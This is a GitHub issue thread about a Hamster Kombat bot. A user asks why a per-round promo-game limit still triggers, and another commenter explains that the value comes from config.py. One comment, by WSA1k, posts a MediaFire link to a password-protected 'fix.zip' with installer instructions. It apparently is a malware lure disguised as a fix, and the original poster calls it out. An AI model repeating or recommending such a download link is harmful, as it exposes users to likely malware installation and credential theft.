### ISSUE TITLE
Maximum number of playground games reached. Increase Limit 

### ISSUE THREAD

**Issue by CipherVasat** [masterking32/MasterHamsterKombatBot#234]
even though i increased the number:

if self.CheckPlayGroundGameState(promo, response):
                promoData = SupportedPromoGames[promo["promoId"]]

                promo_count += 1
                if self.GetConfig(
                    "max_promo_games_per_round", 39
                ) != 0 and promo_count > self.GetConfig("max_promo_games_per_round", 39):
                    log.info(
                        f"[{self.account_name}] Maximum number of playground games reached. We will retrieve other games in the next run."
                    )
                    return

                log.info(
                    f"[{self.account_name}] Starting {promoData['name']} Playground game..."
                )
                time.sleep(1)
                promoCode = self.GetPlayGroundGameKey(promoData)
                if promoCode is not None:
                    log.info(
                        f"\033[1;34m[{self.account_name}] {promoData['name']} key: {promoCode}\033[0m"
                    )
                    time.sleep(2)
                    log.info(f"[{self.account_name}] Claiming {promoData['name']}...")
                    self.ClaimPlayGroundGame(promoCode)
                    log.info(
                        f"[{self.account_name}] {promoData['name']} claimed successfully."
                    )

to 39 still after 3 claims it throws such a message. whats the fix,  am i missing something?

**Comment by Fy0urM** [comment]
> if self.GetConfig(
>                 "max_promo_games_per_round", 39
>             ) != 0 and promo_count > self.GetConfig("max_promo_games_per_round", 39):

the value you changed, as told by the method that uses it, will set the value you selected if the parameter the method requests is not present in config.py

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CipherVasat** [comment]
> > if self.GetConfig(
> > "max_promo_games_per_round", 39
> > ) != 0 and promo_count > self.GetConfig("max_promo_games_per_round", 39):
> 
> the value you changed, as told by the method that uses it, will set the value you selected if the parameter the method requests is not present in config.py

Thanks it's fixed now.



> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

ban this guys xD
